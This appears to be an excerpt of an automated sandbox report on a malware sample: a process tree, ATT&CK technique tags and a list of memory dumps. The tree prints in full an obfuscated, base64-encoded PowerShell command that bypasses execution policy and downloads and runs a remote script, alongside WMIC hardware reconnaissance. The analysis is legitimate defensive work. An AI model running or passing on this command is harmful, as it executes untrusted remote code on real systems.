C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:808
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  PID:2888

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
- Suspicious use of WriteProcessMemory
PID:3264
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:724

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1676
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:1824

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/636-114-0x0000018766CA0000-0x00000187670C0000-memory.dmp

Filesize
4.1MB

Download
memory/636-118-0x0000018766865000-0x0000018766866000-memory.dmp

Filesize
4KB

Download
memory/636-119-0x0000018766866000-0x0000018766867000-memory.dmp

Filesize
4KB

Download
memory/636-116-0x0000018766860000-0x0000018766862000-memory.dmp

Filesize
8KB

Download
memory/636-117-0x0000018766863000-0x0000018766865000-memory.dmp

Filesize
8KB

Download
memory/1268-136-0x000001EFE40F3000-0x000001EFE40F5000-memory.dmp

Filesize
8KB

Download
memory/1268-153-0x000001EFE40F8000-0x000001EFE40F9000-memory.dmp

Filesize
4KB

Download
memory/1268-154-0x000001EFFEEA0000-0x000001EFFEEA1000-memory.dmp

Filesize
4KB

Download
memory/1268-155-0x000001EFFF230000-0x000001EFFF231000-memory.dmp

Filesize
4KB

Download
memory/1268-126-0x000001EFE44A0000-0x000001EFE44A1000-memory.dmp

Filesize
4KB

Download
memory/1268-142-0x000001EFE40F6000-0x000001EFE40F8000-memory.dmp

Filesize
8KB

Download
memory/1268-135-0x000001EFE40F0000-0x000001EFE40F2000-memory.dmp

Filesize
8KB

Download
memory/1268-131-0x000001EFFE860000-0x000001EFFE861000-memory.dmp

Filesize
4KB

Download
memory/1268-147-0x000001EFE44D0000-0x000001EFE44D1000-memory.dmp

Filesize
4KB

Download
memory/1824-395-0x0000028E694D6000-0x0000028E694D8000-memory.dmp

Filesize
8KB

Download
memory/1824-389-0x0000028E694D0000-0x0000028E694D2000-memory.dmp

Filesize
8KB

Download
memory/1824-446-0x0000028E694D8000-0x0000028E694D9000-memory.dmp

Filesize
4KB

Download
memory/1824-390-0x0000028E694D3000-0x0000028E694D5000-memory.dmp

Filesize
8KB

Download
memory/3896-252-0x00000170D2248000-0x00000170D224A000-memory.dmp

Filesize
8KB

Download
memory/3896-219-0x00000170D2243000-0x00000170D2245000-memory.dmp

Filesize
8KB

Download
memory/3896-218-0x00000170D2240000-0x00000170D2242000-memory.dmp

Filesize
8KB

Download
memory/3896-251-0x00000170D2246000-0x00000170D2248000-memory.dmp

Filesize
8KB

Download
memory/3996-290-0x0000024D40243000-0x0000024D40245000-memory.dmp

Filesize
8KB

Download
memory/3996-300-0x0000024D40248000-0x0000024D4024A000-memory.dmp

Filesize
8KB

Download
memory/3996-289-0x0000024D40240000-0x0000024D40242000-memory.dmp

Filesize
8KB

Download
memory/3996-291-0x0000024D40246000-0x0000024D40248000-memory.dmp

Filesize
8KB

Download
memory/4020-217-0x0000019DDFBE8000-0x0000019DDFBEA000-memory.dmp

Filesize
8KB

Download
memory/4020-178-0x0000019DDFBE6000-0x0000019DDFBE8000-memory.dmp

Filesize
8KB

Download
memory/4020-174-0x0000019DDFBE0000-0x0000019DDFBE2000-memory.dmp

Filesize
8KB

Download
memory/4020-175-0x0000019DDFBE3000-0x0000019DDFBE5000-memory.dmp

Filesize
8KB

Download